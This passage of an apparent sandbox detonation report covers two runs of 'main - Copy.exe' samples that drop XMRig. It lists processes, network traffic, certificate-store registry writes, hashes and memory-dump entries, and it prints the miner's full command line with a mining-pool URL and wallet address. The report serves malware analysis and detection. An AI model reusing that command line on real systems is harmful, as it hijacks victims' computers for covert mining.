memory/4456-67-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-68-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-69-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-70-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-71-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-72-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-73-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-74-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-75-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-76-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-77-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-78-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-79-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-80-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-81-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-82-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-83-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-84-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:26
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5084 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5084 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.22.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.22.107.13.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1452-14-0x000001832F510000-0x000001832F530000-memory.dmp
memory/1452-15-0x000001832F540000-0x000001832F560000-memory.dmp
memory/1452-16-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-17-0x000001832F580000-0x000001832F5A0000-memory.dmp
memory/1452-18-0x000001832F560000-0x000001832F580000-memory.dmp
memory/1452-19-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-20-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-21-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-23-0x000001832F560000-0x000001832F580000-memory.dmp
memory/1452-22-0x000001832F580000-0x000001832F5A0000-memory.dmp
memory/1452-24-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-25-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-26-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-27-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-28-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-29-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-30-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-31-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-32-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-33-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-34-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-35-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-36-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-37-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-38-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-39-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-40-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-41-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-42-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-43-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-44-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-45-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-46-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-47-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-48-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-49-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-50-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-51-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-52-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-53-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-54-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-55-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-56-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-57-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-58-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-59-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-60-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-61-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-62-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-63-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-64-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-65-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-66-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-67-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-68-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-69-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-70-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-71-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-72-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-73-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-74-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-75-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-76-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-77-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-78-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-79-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-80-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-81-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
memory/1452-82-0x00007FF6E14A0000-0x00007FF6E1FA3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:28
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5108 wrote to memory of 2192 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5108 wrote to memory of 2192 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.22.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.22.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2192-14-0x0000019F89BE0000-0x0000019F89C00000-memory.dmp
memory/2192-15-0x0000019F89C30000-0x0000019F89C50000-memory.dmp
memory/2192-16-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-18-0x0000019F89E50000-0x0000019F89E70000-memory.dmp
memory/2192-17-0x0000019F8B620000-0x0000019F8B640000-memory.dmp
memory/2192-19-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-20-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-21-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-22-0x0000019F8B620000-0x0000019F8B640000-memory.dmp
memory/2192-23-0x0000019F89E50000-0x0000019F89E70000-memory.dmp
memory/2192-24-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-25-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-26-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-27-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-28-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-29-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-30-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-31-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-32-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-33-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-34-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-35-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-36-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-37-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-38-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-39-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-40-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-41-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-42-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-43-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-44-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-45-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-46-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-47-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-48-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-49-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-50-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-51-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-52-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
memory/2192-53-0x00007FF7443F0000-0x00007FF744EF3000-memory.dmp
